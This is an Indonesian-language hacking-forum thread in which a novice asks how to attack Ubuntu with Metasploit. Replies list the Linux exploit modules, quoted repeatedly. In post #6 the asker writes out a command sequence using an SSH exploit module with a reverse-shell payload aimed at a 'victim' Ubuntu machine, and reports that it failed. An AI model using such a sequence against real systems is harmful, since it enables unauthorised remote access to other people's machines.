[help] metasploit ubuntu
#1
misi om2 sekalian, mau nanya nih kalo exploit ubuntu gimana caranya ya? apakah bisa? maklum masih baru ama yang beginian. trus cari di google juga ga nemu2 nih,,,
mohon bantuannya,,,
thanks.

#2
(04-27-2013, 02:55 AM)insanlaksana Wrote: misi om2 sekalian, mau nanya nih kalo exploit ubuntu gimana caranya ya? apakah bisa? maklum masih baru ama yang beginian. trus cari di google juga ga nemu2 nih,,,
mohon bantuannya,,,
thanks.

metasploit untuk menyerang ubuntu? atau mau install di ubuntu?

#3
(04-27-2013, 07:18 AM)junior.riau18 Wrote:
(04-27-2013, 02:55 AM)insanlaksana Wrote: misi om2 sekalian, mau nanya nih kalo exploit ubuntu gimana caranya ya? apakah bisa? maklum masih baru ama yang beginian. trus cari di google juga ga nemu2 nih,,,
mohon bantuannya,,,
thanks.

metasploit untuk menyerang ubuntu? atau mau install di ubuntu?

iya om, untuk menyerang ubuntu. kira2 bisa ga ya? maaf klo konyol pertanyaan nya, masih awam nih. hehe. soalnya di google hampir semua tutorial korbannya windows.
thanks.

#4
linux/windows exploitnya sudah disediakan di dlam metasploit bro

Code:
msf > use exploit/linux/
use exploit/linux/browser/adobe_flashplayer_aslaunch     use exploit/linux/madwifi/madwifi_giwscan_cb
use exploit/linux/ftp/proftp_sreplace                    use exploit/linux/misc/accellion_fta_mpipe2
use exploit/linux/ftp/proftp_telnet_iac                  use exploit/linux/misc/drb_remote_codeexec
use exploit/linux/games/ut2004_secure                    use exploit/linux/misc/gld_postfix
use exploit/linux/http/alcatel_omnipcx_mastercgi_exec    use exploit/linux/misc/hp_data_protector_cmd_exec
use exploit/linux/http/ddwrt_cgibin_exec                 use exploit/linux/misc/hplip_hpssd_exec
use exploit/linux/http/dolibarr_cmd_exec                 use exploit/linux/misc/ib_inet_connect
use exploit/linux/http/gpsd_format_string                use exploit/linux/misc/ib_jrd8_create_database
use exploit/linux/http/linksys_apply_cgi                 use exploit/linux/misc/ib_open_marker_file
use exploit/linux/http/peercast_url                      use exploit/linux/misc/ib_pwd_db_aliased
use exploit/linux/http/piranha_passwd_exec               use exploit/linux/misc/lprng_format_string
use exploit/linux/http/symantec_web_gateway_exec         use exploit/linux/misc/netsupport_manager_agent
use exploit/linux/http/symantec_web_gateway_file_upload  use exploit/linux/mysql/mysql_yassl_getname
use exploit/linux/http/symantec_web_gateway_lfi          use exploit/linux/mysql/mysql_yassl_hello
use exploit/linux/http/symantec_web_gateway_pbcontrol    use exploit/linux/pop3/cyrus_pop3d_popsubfolders
use exploit/linux/http/vcms_upload                       use exploit/linux/pptp/poptop_negative_read
use exploit/linux/http/webcalendar_settings_exec         use exploit/linux/proxy/squid_ntlm_authenticate
use exploit/linux/http/webid_converter                   use exploit/linux/samba/chain_reply
use exploit/linux/http/zenoss_showdaemonxmlconfig_exec   use exploit/linux/samba/lsa_transnames_heap
use exploit/linux/ids/snortbopre                         use exploit/linux/samba/trans2open
use exploit/linux/imap/imap_uw_lsub                      use exploit/linux/ssh/f5_bigip_known_privkey
use exploit/linux/local/sock_sendpage                    use exploit/linux/telnet/telnet_encrypt_keyid

berbagai macam exploit kan Big Grin silahkan di explore ya

#5
(04-27-2013, 01:49 PM)xsan-lahci Wrote: linux/windows exploitnya sudah disediakan di dlam metasploit bro

Code:
msf > use exploit/linux/
use exploit/linux/browser/adobe_flashplayer_aslaunch     use exploit/linux/madwifi/madwifi_giwscan_cb
use exploit/linux/ftp/proftp_sreplace                    use exploit/linux/misc/accellion_fta_mpipe2
use exploit/linux/ftp/proftp_telnet_iac                  use exploit/linux/misc/drb_remote_codeexec
use exploit/linux/games/ut2004_secure                    use exploit/linux/misc/gld_postfix
use exploit/linux/http/alcatel_omnipcx_mastercgi_exec    use exploit/linux/misc/hp_data_protector_cmd_exec
use exploit/linux/http/ddwrt_cgibin_exec                 use exploit/linux/misc/hplip_hpssd_exec
use exploit/linux/http/dolibarr_cmd_exec                 use exploit/linux/misc/ib_inet_connect
use exploit/linux/http/gpsd_format_string                use exploit/linux/misc/ib_jrd8_create_database
use exploit/linux/http/linksys_apply_cgi                 use exploit/linux/misc/ib_open_marker_file
use exploit/linux/http/peercast_url                      use exploit/linux/misc/ib_pwd_db_aliased
use exploit/linux/http/piranha_passwd_exec               use exploit/linux/misc/lprng_format_string
use exploit/linux/http/symantec_web_gateway_exec         use exploit/linux/misc/netsupport_manager_agent
use exploit/linux/http/symantec_web_gateway_file_upload  use exploit/linux/mysql/mysql_yassl_getname
use exploit/linux/http/symantec_web_gateway_lfi          use exploit/linux/mysql/mysql_yassl_hello
use exploit/linux/http/symantec_web_gateway_pbcontrol    use exploit/linux/pop3/cyrus_pop3d_popsubfolders
use exploit/linux/http/vcms_upload                       use exploit/linux/pptp/poptop_negative_read
use exploit/linux/http/webcalendar_settings_exec         use exploit/linux/proxy/squid_ntlm_authenticate
use exploit/linux/http/webid_converter                   use exploit/linux/samba/chain_reply
use exploit/linux/http/zenoss_showdaemonxmlconfig_exec   use exploit/linux/samba/lsa_transnames_heap
use exploit/linux/ids/snortbopre                         use exploit/linux/samba/trans2open
use exploit/linux/imap/imap_uw_lsub                      use exploit/linux/ssh/f5_bigip_known_privkey
use exploit/linux/local/sock_sendpage                    use exploit/linux/telnet/telnet_encrypt_keyid

berbagai macam exploit kan Big Grin silahkan di explore ya

ohohoho, thanks berat om,,, saya coba googling-googling dlu deh cara nya...

#6
(04-27-2013, 02:32 PM)insanlaksana Wrote:
(04-27-2013, 01:49 PM)xsan-lahci Wrote: linux/windows exploitnya sudah disediakan di dlam metasploit bro

Code:
msf > use exploit/linux/
use exploit/linux/browser/adobe_flashplayer_aslaunch     use exploit/linux/madwifi/madwifi_giwscan_cb
use exploit/linux/ftp/proftp_sreplace                    use exploit/linux/misc/accellion_fta_mpipe2
use exploit/linux/ftp/proftp_telnet_iac                  use exploit/linux/misc/drb_remote_codeexec
use exploit/linux/games/ut2004_secure                    use exploit/linux/misc/gld_postfix
use exploit/linux/http/alcatel_omnipcx_mastercgi_exec    use exploit/linux/misc/hp_data_protector_cmd_exec
use exploit/linux/http/ddwrt_cgibin_exec                 use exploit/linux/misc/hplip_hpssd_exec
use exploit/linux/http/dolibarr_cmd_exec                 use exploit/linux/misc/ib_inet_connect
use exploit/linux/http/gpsd_format_string                use exploit/linux/misc/ib_jrd8_create_database
use exploit/linux/http/linksys_apply_cgi                 use exploit/linux/misc/ib_open_marker_file
use exploit/linux/http/peercast_url                      use exploit/linux/misc/ib_pwd_db_aliased
use exploit/linux/http/piranha_passwd_exec               use exploit/linux/misc/lprng_format_string
use exploit/linux/http/symantec_web_gateway_exec         use exploit/linux/misc/netsupport_manager_agent
use exploit/linux/http/symantec_web_gateway_file_upload  use exploit/linux/mysql/mysql_yassl_getname
use exploit/linux/http/symantec_web_gateway_lfi          use exploit/linux/mysql/mysql_yassl_hello
use exploit/linux/http/symantec_web_gateway_pbcontrol    use exploit/linux/pop3/cyrus_pop3d_popsubfolders
use exploit/linux/http/vcms_upload                       use exploit/linux/pptp/poptop_negative_read
use exploit/linux/http/webcalendar_settings_exec         use exploit/linux/proxy/squid_ntlm_authenticate
use exploit/linux/http/webid_converter                   use exploit/linux/samba/chain_reply
use exploit/linux/http/zenoss_showdaemonxmlconfig_exec   use exploit/linux/samba/lsa_transnames_heap
use exploit/linux/ids/snortbopre                         use exploit/linux/samba/trans2open
use exploit/linux/imap/imap_uw_lsub                      use exploit/linux/ssh/f5_bigip_known_privkey
use exploit/linux/local/sock_sendpage                    use exploit/linux/telnet/telnet_encrypt_keyid

berbagai macam exploit kan Big Grin silahkan di explore ya

ohohoho, thanks berat om,,, saya coba googling-googling dlu deh cara nya...

oia, saya coba yang exploit ssh, korban nya ubuntu 10.04.
cara nya :
msf > use exploit/linux/ssh/f5_bigip_known_privkey
msf exploit(f5_bigip_known_privkey) > show payloads
msf exploit(f5_bigip_known_privkey) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(f5_bigip_known_privkey) > set LHOST [MY IP ADDRESS]
msf exploit(f5_bigip_known_privkey) > set RHOST [TARGET IP]
msf exploit(f5_bigip_known_privkey) > exploit

tapi ko failed authentication ya?
anybody help?
thanks,,,

#7
coba cek SSH dah open gak om, kalo open akang cob pake terminal ato putty for linux






Users browsing this thread: 1 Guest(s)